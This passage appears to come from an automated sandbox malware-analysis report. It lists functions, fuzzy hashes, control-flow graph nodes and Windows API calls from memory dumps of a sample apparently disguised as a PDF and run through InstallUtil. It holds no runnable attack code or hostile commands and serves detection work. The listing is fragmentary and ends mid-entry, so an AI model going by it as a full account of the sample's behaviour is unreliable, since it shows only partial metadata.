                                                                          • Opcode Fuzzy Hash: 20c99389f841b4e963ffe19008cf242373ca3b27fe2601d2bf4c616531e61475
                                                                          • Instruction Fuzzy Hash: 56C08C3204035842E350BBE86909368326D6B4031DF890105CA0C114008EB05080DB37

                                                                          Non-executed Functions

                                                                          Function 05AB6E5B Relevance: 1.6, Instructions: 1600COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2282883886.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp, Offset: 05AB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2283005490.0000000005B00000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5ab0000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b8ef338a347d78b24a48a91f5c579d559d241ca399c22e27505efb135b2aab1a
                                                                          • Instruction ID: 38abe7dd1042be0fb53048ebea6c4231613550f466da05975beb372ee9a10ff0
                                                                          • Opcode Fuzzy Hash: b8ef338a347d78b24a48a91f5c579d559d241ca399c22e27505efb135b2aab1a
                                                                          • Instruction Fuzzy Hash: 17C29A6240E3C15FE7138B749DB6AE17FB5EE9321471E05DBC0C18B063E2A8594BD7A2
                                                                          Function 072A001F Relevance: 1.3, Strings: 1, Instructions: 76COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2285605041.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_72a0000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 3
                                                                          • API String ID: 0-1842515611
                                                                          • Opcode ID: 4d527e3e6146c5cbd133b28d02027d1f52503f28bcf85eaaf48e5ed1788e6188
                                                                          • Instruction ID: f85151a74bff3698dd8678133e42c28ab2bd9701759759cbf16eac8ffc928a6f
                                                                          • Opcode Fuzzy Hash: 4d527e3e6146c5cbd133b28d02027d1f52503f28bcf85eaaf48e5ed1788e6188
                                                                          • Instruction Fuzzy Hash: F7311C71D047698BEB29CF268C54799FBF6AFC5300F04C1FAC448AA255E7710A868F11
                                                                          Function 072A0040 Relevance: 1.3, Strings: 1, Instructions: 73COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2285605041.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_72a0000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 3
                                                                          • API String ID: 0-1842515611
                                                                          • Opcode ID: 72b31215ea24da37c603acdb5f6709d8aae53809d4f0c763b6eb49da5471f05c
                                                                          • Instruction ID: 22b63db16ae17db95c6dc5724131cc91349dcf8b576de067afa21d88fad3dc78
                                                                          • Opcode Fuzzy Hash: 72b31215ea24da37c603acdb5f6709d8aae53809d4f0c763b6eb49da5471f05c
                                                                          • Instruction Fuzzy Hash: DB31CBB1D156298BEB28DF16C95879AFAF7BF89300F04C0EA980CA7255E7705A858F11
                                                                          Function 072BE3B0 Relevance: .2, Instructions: 195COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2285605041.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_72a0000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c51f3204f7728c6863f912a35968c5a1849c7115ad2de4cef4e6309224363143
                                                                          • Instruction ID: 91f7fa70213ecb301244cb2b771719979b1b588086f902d9200675bce98aff9e
                                                                          • Opcode Fuzzy Hash: c51f3204f7728c6863f912a35968c5a1849c7115ad2de4cef4e6309224363143
                                                                          • Instruction Fuzzy Hash: F98117B0E24218CFDB64DFA9C8847EDBBB6EF4A340F1184A9C409A7241DBB55A85CF51
                                                                          Function 01329538 Relevance: .2, Instructions: 171COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2262259084.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1320000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3a6e3b2109ddf4057fabbcd718c5686caac721f8244e75941322b69e55d3ac76
                                                                          • Instruction ID: f600f5e931c567ee3b36e9ed1096887bd188f996522ffb9f0ee5ab93d552af61
                                                                          • Opcode Fuzzy Hash: 3a6e3b2109ddf4057fabbcd718c5686caac721f8244e75941322b69e55d3ac76
                                                                          • Instruction Fuzzy Hash: A6712CB1E00205CFDB5CEF6AE884699BBF2FBC8308F14D12AD14597329DB745849CB51
                                                                          Function 01329548 Relevance: .2, Instructions: 165COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2262259084.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1320000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 86ac99122b8a67bcc4841abb418fc1ce091f990ea2213fef4ac7f1e8b4776837
                                                                          • Instruction ID: 64ca4193cfb402f0de0bb7ca5661a83f20093c842674241ac9e9747797df2bcb
                                                                          • Opcode Fuzzy Hash: 86ac99122b8a67bcc4841abb418fc1ce091f990ea2213fef4ac7f1e8b4776837
                                                                          • Instruction Fuzzy Hash: 2A712CB1E00209CFDB5CDF6AE884699BBF2FBC8308F14D12AD10997369EB755849CB51
                                                                          Function 01329B50 Relevance: .2, Instructions: 155COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2262259084.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1320000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: fc2b76edea634747b5fdc7ecf498e79a0bc1d88e589530bb6de88c5223b7a5d0
                                                                          • Instruction ID: 2bff0d3cba183c1ac7830c3ed8ef9c420b974561d14d5d2e3ba599573155b5ca
                                                                          • Opcode Fuzzy Hash: fc2b76edea634747b5fdc7ecf498e79a0bc1d88e589530bb6de88c5223b7a5d0
                                                                          • Instruction Fuzzy Hash: 9371A170D056288FEB68DF2ACD48799BBF6BF88305F10C1E9C50DA7664EB744A858F00

                                                                          Execution Graph

                                                                          Execution Coverage:8.7%
                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:38
                                                                          Total number of Limit Nodes:2
                                                                          execution_graph 40792 142d030 40793 142d048 40792->40793 40794 142d0a2 40793->40794 40797 66ba48c CallWindowProcW 40793->40797 40799 66bd6a8 40793->40799 40803 66bd697 40793->40803 40807 66be7f8 40793->40807 40797->40794 40800 66bd6ce 40799->40800 40801 66ba48c CallWindowProcW 40800->40801 40802 66bd6ef 40801->40802 40802->40794 40804 66bd6a5 40803->40804 40805 66ba48c CallWindowProcW 40804->40805 40806 66bd6ef 40805->40806 40806->40794 40808 66be808 40807->40808 40810 66be859 40808->40810 40811 66be46c CallWindowProcW 40808->40811 40811->40810 40768 66bfc00 40769 66bfc1c 40768->40769 40770 66bfd1c 40769->40770 40771 66bfc72 40769->40771 40775 66ba48c 40770->40775 40773 66bfcca CallWindowProcW 40771->40773 40774 66bfc79 40771->40774 40773->40774 40776 66ba497 40775->40776 40778 66be859 40776->40778 40779 66be46c CallWindowProcW 40776->40779 40779->40778 40812 66bd4f0 40813 66bd558 CreateWindowExW 40812->40813 40815 66bd614 40813->40815 40780 657dcf8 40781 657dd05 40780->40781 40782 657dd2d 40780->40782 40788 657d8e8 40782->40788 40784 657dd4e 40786 657de16 GlobalMemoryStatusEx 40787 657de46 40786->40787 40789 657ddd0 GlobalMemoryStatusEx 40788->40789 40791 657dd4a 40789->40791 40791->40784 40791->40786

                                                                          Executed Functions

                                                                          Function 01479AE0 Relevance: 3.1, Instructions: 3061COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2452571438.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_1470000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 784f5a540594ae116b572cf3e9ee4ea2950b5f0706e1ad2c5f758d5e98310f56
                                                                          • Instruction ID: be92bd4a36129d9b32944eef270282b049ccfac11d54e2da144cc1bc0be834af
                                                                          • Opcode Fuzzy Hash: 784f5a540594ae116b572cf3e9ee4ea2950b5f0706e1ad2c5f758d5e98310f56
                                                                          • Instruction Fuzzy Hash: E0630A31D10B5A8ACB51EF68C8805E9F7B1FF99310F15C79AE45877221EB70AAC5CB81
                                                                          Function 01479330 Relevance: .6, Instructions: 614COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2452571438.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_1470000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2657582126d974b30e100d028700a94880f2bc0d4763bb45401f38b38c8e712d
                                                                          • Instruction ID: 61260782ecbc5fa5dfb9ced72cff699d7a027255ea8f5a487b07876bdc394b40
                                                                          • Opcode Fuzzy Hash: 2657582126d974b30e100d028700a94880f2bc0d4763bb45401f38b38c8e712d
                                                                          • Instruction Fuzzy Hash: E1328134B012058FDB14DF69D584AAEBBB2FF88324F24856AE509DB3A5DB30DD41CB91
                                                                          Function 01474A40 Relevance: .3, Instructions: 266COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2452571438.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_1470000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ab6f81233e02a1ec30f24bd1516f5f264385c4855e97fc6ed268f74126962447
                                                                          • Instruction ID: 63a7b0214f365eeaab96f62c117e2afa1100f1d6af0575ff22bacbdec7cb9292
                                                                          • Opcode Fuzzy Hash: ab6f81233e02a1ec30f24bd1516f5f264385c4855e97fc6ed268f74126962447
                                                                          • Instruction Fuzzy Hash: BCB15E70E00209CFDB14CFA9D9917EEBBF2AF88714F18852AD415E73A4EB749845CB81
                                                                          Function 01473E28 Relevance: .2, Instructions: 238COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2452571438.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_1470000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c4ce41c2ccb25eb206d14cf1ff90ac1a132ef7e1139576b7be2f7ad519098cea
                                                                          • Instruction ID: 233bf97da7af50300e668f8654a2b0635ebe79ebba61d93f98d6b0c92fe6d3c5
                                                                          • Opcode Fuzzy Hash: c4ce41c2ccb25eb206d14cf1ff90ac1a132ef7e1139576b7be2f7ad519098cea
                                                                          • Instruction Fuzzy Hash: 1A916D70E00249DFDB11CFA9C9957EEBBF2BF88714F14812AE405A73A4DB749845CB81
                                                                          Function 0657DCF8 Relevance: 1.6, APIs: 1, Instructions: 136COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 695 657dcf8-657dd03 696 657dd05-657dd2c call 657d118 695->696 697 657dd2d-657dd4c call 657d8e8 695->697 703 657dd52-657ddb1 697->703 704 657dd4e-657dd51 697->704 711 657ddb7-657de44 GlobalMemoryStatusEx 703->711 712 657ddb3-657ddb6 703->712 715 657de46-657de4c 711->715 716 657de4d-657de75 711->716 715->716
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2470395115.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_6570000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f94c6585753f2205566331759fef3d60cb7baf302a9133b4e5b28f619af5effa
                                                                          • Instruction ID: 68e10ff497e4bab522ac841964638e119039f34a1b386a1dc5e6149e94aefe45
                                                                          • Opcode Fuzzy Hash: f94c6585753f2205566331759fef3d60cb7baf302a9133b4e5b28f619af5effa
                                                                          • Instruction Fuzzy Hash: 9E410332D0439A9FCB14CF6AD8006EEBBF5BF89210F14866AE408E7350DB749845CBE0
                                                                          Function 066BD4E4 Relevance: 1.6, APIs: 1, Instructions: 120COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 719 66bd4e4-66bd556 721 66bd558-66bd55e 719->721 722 66bd561-66bd568 719->722 721->722 723 66bd56a-66bd570 722->723 724 66bd573-66bd5ab 722->724 723->724 725 66bd5b3-66bd612 CreateWindowExW 724->725 726 66bd61b-66bd653 725->726 727 66bd614-66bd61a 725->727 731 66bd660 726->731 732 66bd655-66bd658 726->732 727->726 733 66bd661 731->733 732->731 733->733
                                                                          APIs
                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 066BD602
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2470690468.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_66b0000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID: CreateWindow
                                                                          • String ID:
                                                                          • API String ID: 716092398-0
                                                                          • Opcode ID: 85b37b823743278430b52b7d8339fa35ee5833f11a8c87dafc2ef4beaab261f1
                                                                          • Instruction ID: 7cc9e8ea0ad0f413880b55b6f7ee84eb4c2ca3b0b4bf568f4081224b96f5c6df
                                                                          • Opcode Fuzzy Hash: 85b37b823743278430b52b7d8339fa35ee5833f11a8c87dafc2ef4beaab261f1
                                                                          • Instruction Fuzzy Hash: 2451C2B1D00349EFDF14CF9AC984ADEBBB5BF48314F24912AE819AB210D7759885CF90
                                                                          Function 066BD4F0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 734 66bd4f0-66bd556 735 66bd558-66bd55e 734->735 736 66bd561-66bd568 734->736 735->736 737 66bd56a-66bd570 736->737 738 66bd573-66bd612 CreateWindowExW 736->738 737->738 740 66bd61b-66bd653 738->740 741 66bd614-66bd61a 738->741 745 66bd660 740->745 746 66bd655-66bd658 740->746 741->740 747 66bd661 745->747 746->745 747->747
                                                                          APIs
                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 066BD602
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2470690468.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_66b0000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID: CreateWindow
                                                                          • String ID:
                                                                          • API String ID: 716092398-0
                                                                          • Opcode ID: 9b34bd6fcfcb796565175e2feb6a285fe328fd9f1c3b0a8d2996f259dc1a6f72
                                                                          • Instruction ID: 91c017352e4dd28d4bc5a553f64f079ba5e405b673d7dc62a5d56d30dcdf52c6
                                                                          • Opcode Fuzzy Hash: 9b34bd6fcfcb796565175e2feb6a285fe328fd9f1c3b0a8d2996f259dc1a6f72
                                                                          • Instruction Fuzzy Hash: 0941B1B1D00349EFDB14CF9AC884ADEBBB5BF48314F24912AE818AB210D7759885CF90
                                                                          Function 066BE46C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 748 66be46c-66bfc6c 751 66bfd1c-66bfd3c call 66ba48c 748->751 752 66bfc72-66bfc77 748->752 759 66bfd3f-66bfd4c 751->759 754 66bfcca-66bfd02 CallWindowProcW 752->754 755 66bfc79-66bfcb0 752->755 756 66bfd0b-66bfd1a 754->756 757 66bfd04-66bfd0a 754->757 762 66bfcb9-66bfcc8 755->762 763 66bfcb2-66bfcb8 755->763 756->759 757->756 762->759 763->762
                                                                          APIs
                                                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 066BFCF1
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2470690468.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_66b0000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID: CallProcWindow
                                                                          • String ID:
                                                                          • API String ID: 2714655100-0
                                                                          • Opcode ID: c52e8f9fe965be4b4ed49991389a8405ff4a6519ad43a753b9c1fbf7cea3ac8b
                                                                          • Instruction ID: 2fd74a3cbad3eb8426e998e03218584a4e01500654d55ce5d8ff98b27d00461b
                                                                          • Opcode Fuzzy Hash: c52e8f9fe965be4b4ed49991389a8405ff4a6519ad43a753b9c1fbf7cea3ac8b
                                                                          • Instruction Fuzzy Hash: D24118B5900309DFDB54CF99C888AAABBF5FF88314F24C859D519A7321D774A881CFA0
                                                                          Function 0657DDC8 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 772 657ddc8-657de0e 773 657de16-657de44 GlobalMemoryStatusEx 772->773 774 657de46-657de4c 773->774 775 657de4d-657de75 773->775 774->775
                                                                          APIs
                                                                          • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0657DD4A), ref: 0657DE37
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2470395115.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_6570000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID: GlobalMemoryStatus
                                                                          • String ID:
                                                                          • API String ID: 1890195054-0
                                                                          • Opcode ID: 08fe2f5826bae541cedc39fd83ca295d0de066d384503ac6521607da03458d19
                                                                          • Instruction ID: abd45254c3a1bc7f06e1414a6b39c60b506002781720b95480133262805904e1
                                                                          • Opcode Fuzzy Hash: 08fe2f5826bae541cedc39fd83ca295d0de066d384503ac6521607da03458d19
                                                                          • Instruction Fuzzy Hash: 041136B1C0065ADFCB10CF9AD844BDEFBB4BF48320F14821AE818A3240D778A941CFA1
                                                                          Function 0657D8E8 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 765 657d8e8-657de44 GlobalMemoryStatusEx 768 657de46-657de4c 765->768 769 657de4d-657de75 765->769 768->769
                                                                          APIs
                                                                          • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0657DD4A), ref: 0657DE37
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2470395115.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_6570000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID: GlobalMemoryStatus
                                                                          • String ID:
                                                                          • API String ID: 1890195054-0
                                                                          • Opcode ID: 8bec3c2e115766bdb447ba738cc8611ccf46d8cfff035d73691dbfb26f5cc1ce
                                                                          • Instruction ID: 0e5e4b6dfb90ee672fb711953e0ea046d005cd58e8f7a1f17080ab6096905007
                                                                          • Opcode Fuzzy Hash: 8bec3c2e115766bdb447ba738cc8611ccf46d8cfff035d73691dbfb26f5cc1ce
                                                                          • Instruction Fuzzy Hash: 3D1106B1C0065ADFDB10CF9AD4447AEFBF4BF48220F14866AE918B7240D778A954CFA5
                                                                          Function 01479108 Relevance: 1.3, Strings: 1, Instructions: 75COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 778 1479108-1479133 779 1479135-1479138 778->779 780 1479171-1479173 779->780 781 147913a-147916c 779->781 782 1479175 780->782 783 147917a-147917d 780->783 781->780 782->783 783->779 784 147917f-147918e 783->784 786 14791d1-14791e6 784->786 787 1479190-1479196 784->787 790 14791e7 786->790 796 1479199 call 1479207 787->796 797 1479199 call 6574290 787->797 798 1479199 call 657c090 787->798 799 1479199 call 657c310 787->799 800 1479199 call 657591e 787->800 801 1479199 call 657845d 787->801 802 1479199 call 657015b 787->802 803 1479199 call 6573b59 787->803 804 1479199 call 65758d9 787->804 805 1479199 call 6571118 787->805 806 1479199 call 6578498 787->806 807 1479199 call 6570006 787->807 808 1479199 call 6573f41 787->808 809 1479199 call 6570040 787->809 810 1479199 call 657134f 787->810 811 1479199 call 6579d0a 787->811 812 1479199 call 657110a 787->812 813 1479199 call 65766c8 787->813 814 1479199 call 147f158 787->814 815 1479199 call 6579708 787->815 816 1479199 call 6578bc8 787->816 817 1479199 call 1479218 787->817 818 1479199 call 6577888 787->818 819 1479199 call 657a4c8 787->819 820 1479199 call 6571008 787->820 821 1479199 call 6578248 787->821 822 1479199 call 65766bb 787->822 823 1479199 call 65796fa 787->823 824 1479199 call 657787a 787->824 825 1479199 call 6570ffa 787->825 826 1479199 call 147f168 787->826 827 1479199 call 65752f8 787->827 828 1479199 call 657a4b8 787->828 829 1479199 call 65705b8 787->829 830 1479199 call 6578238 787->830 831 1479199 call 65787a2 787->831 832 1479199 call 657c0a0 787->832 833 1479199 call 657c320 787->833 834 1479199 call 6571360 787->834 835 1479199 call 6573da8 787->835 836 1479199 call 6573b68 787->836 837 1479199 call 65752e8 787->837 789 147919f-14791b4 call 1470b50 793 14791b9-14791cf 789->793 790->790 793->786 793->787 796->789 797->789 798->789 799->789 800->789 801->789 802->789 803->789 804->789 805->789 806->789 807->789 808->789 809->789 810->789 811->789 812->789 813->789 814->789 815->789 816->789 817->789 818->789 819->789 820->789 821->789 822->789 823->789 824->789 825->789 826->789 827->789 828->789 829->789 830->789 831->789 832->789 833->789 834->789 835->789 836->789 837->789
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2452571438.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_1470000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: U
                                                                          • API String ID: 0-3372436214
                                                                          • Opcode ID: bcf2dcad66a95c9bfd9f07ddfcc155f0773e744c832ebc299939ee2afec2ce58
                                                                          • Instruction ID: 9ec3884a1a75bc9ff3039d7a11cfe4d9646cc625769012d25010e45b43fb8375
                                                                          • Opcode Fuzzy Hash: bcf2dcad66a95c9bfd9f07ddfcc155f0773e744c832ebc299939ee2afec2ce58
                                                                          • Instruction Fuzzy Hash: 06219031E0065A8BDB19CF68D8546DEB7B2EF89324F10C66EEC15EB360EB709855CB50
                                                                          Function 014778C0 Relevance: .6, Instructions: 554COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 2361 14778c0-14778d7 2363 14778d9-14778dc 2361->2363 2364 14778de-1477904 2363->2364 2365 1477909-147790c 2363->2365 2364->2365 2366 147790e-1477934 2365->2366 2367 1477939-147793c 2365->2367 2366->2367 2369 147793e-1477964 2367->2369 2370 1477969-147796c 2367->2370 2369->2370 2371 147796e-1477994 2370->2371 2372 1477999-147799c 2370->2372 2371->2372 2376 147799e-14779c4 2372->2376 2377 14779c9-14779cc 2372->2377 2376->2377 2378 14779ce-14779e4 2377->2378 2379 14779e9-14779ec 2377->2379 2378->2379 2385 14779ee-1477a14 2379->2385 2386 1477a19-1477a1c 2379->2386 2385->2386 2387 1477a1e-1477a44 2386->2387 2388 1477a49-1477a4c 2386->2388 2387->2388 2394 1477a4e-1477a74 2388->2394 2395 1477a79-1477a7c 2388->2395 2394->2395 2397 1477a7e-1477aa4 2395->2397 2398 1477aa9-1477aac 2395->2398 2397->2398 2404 1477aae-1477ad4 2398->2404 2405 1477ad9-1477adc 2398->2405 2404->2405 2407 1477ade-1477b04 2405->2407 2408 1477b09-1477b0c 2405->2408 2407->2408 2413 1477b0e-1477b34 2408->2413 2414 1477b39-1477b3c 2408->2414 2413->2414 2416 1477b3e-1477b64 2414->2416 2417 1477b69-1477b6c 2414->2417 2416->2417 2423 1477b6e-1477b94 2417->2423 2424 1477b99-1477b9c 2417->2424 2423->2424 2426 1477b9e-1477bc4 2424->2426 2427 1477bc9-1477bcc 2424->2427 2426->2427 2433 1477bce 2427->2433 2434 1477bd9-1477bdc 2427->2434 2445 1477bd4 2433->2445 2436 1477bde-1477c04 2434->2436 2437 1477c09-1477c0c 2434->2437 2436->2437 2443 1477c0e-1477c34 2437->2443 2444 1477c39-1477c3c 2437->2444 2443->2444 2446 1477c3e-1477c64 2444->2446 2447 1477c69-1477c6c 2444->2447 2445->2434 2446->2447 2452 1477c6e-1477c94 2447->2452 2453 1477c99-1477c9c 2447->2453 2452->2453 2455 1477c9e-1477cc4 2453->2455 2456 1477cc9-1477ccc 2453->2456 2455->2456 2460 1477cce-1477cf4 2456->2460 2461 1477cf9-1477cfc 2456->2461 2460->2461 2464 1477d17-1477d1a 2461->2464 2465 1477cfe-1477d12 2461->2465 2469 1477d47-1477d4a 2464->2469 2470 1477d1c-1477d42 2464->2470 2465->2464 2477 1477d77-1477d7a 2469->2477 2478 1477d4c-1477d72 2469->2478 2470->2469 2479 1477da7-1477daa 2477->2479 2480 1477d7c-1477da2 2477->2480 2478->2477 2487 1477dd7-1477dda 2479->2487 2488 1477dac-1477dd2 2479->2488 2480->2479 2489 1477e07-1477e0a 2487->2489 2490 1477ddc-1477e02 2487->2490 2488->2487 2496 1477e37-1477e3a 2489->2496 2497 1477e0c-1477e32 2489->2497 2490->2489 2498 1477e67-1477e6a 2496->2498 2499 1477e3c-1477e62 2496->2499 2497->2496 2506 1477e97-1477e9a 2498->2506 2507 1477e6c-1477e92 2498->2507 2499->2498 2508 1477ec7-1477eca 2506->2508 2509 1477e9c-1477ec2 2506->2509 2507->2506 2516 1477ef7-1477efa 2508->2516 2517 1477ecc-1477ef2 2508->2517 2509->2508 2518 1477f27-1477f2a 2516->2518 2519 1477efc-1477f22 2516->2519 2517->2516 2526 1477f2c-1477f2e 2518->2526 2527 1477f3b-1477f3e 2518->2527 2519->2518 2576 1477f30 call 14791bb 2526->2576 2577 1477f30 call 1479108 2526->2577 2578 1477f30 call 1479118 2526->2578 2528 1477f40-1477f66 2527->2528 2529 1477f6b-1477f6e 2527->2529 2528->2529 2536 1477f70-1477f96 2529->2536 2537 1477f9b-1477f9e 2529->2537 2533 1477f36 2533->2527 2536->2537 2538 1477fa0-1477fc6 2537->2538 2539 1477fcb-1477fce 2537->2539 2538->2539 2544 1477fd0-1477ff6 2539->2544 2545 1477ffb-1477ffe 2539->2545 2544->2545 2547 1478000-1478026 2545->2547 2548 147802b-147802e 2545->2548 2547->2548 2552 1478030-1478056 2548->2552 2553 147805b-147805e 2548->2553 2552->2553 2556 1478060-1478086 2553->2556 2557 147808b-147808d 2553->2557 2556->2557 2562 1478094-1478097 2557->2562 2563 147808f 2557->2563 2562->2363 2569 147809d-14780a3 2562->2569 2563->2562 2576->2533 2577->2533 2578->2533
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2452571438.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_1470000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: edb22a8cc3a50abd125d526676c3bdf1a1b4877ddaaebbf2feebc4c48234c56b
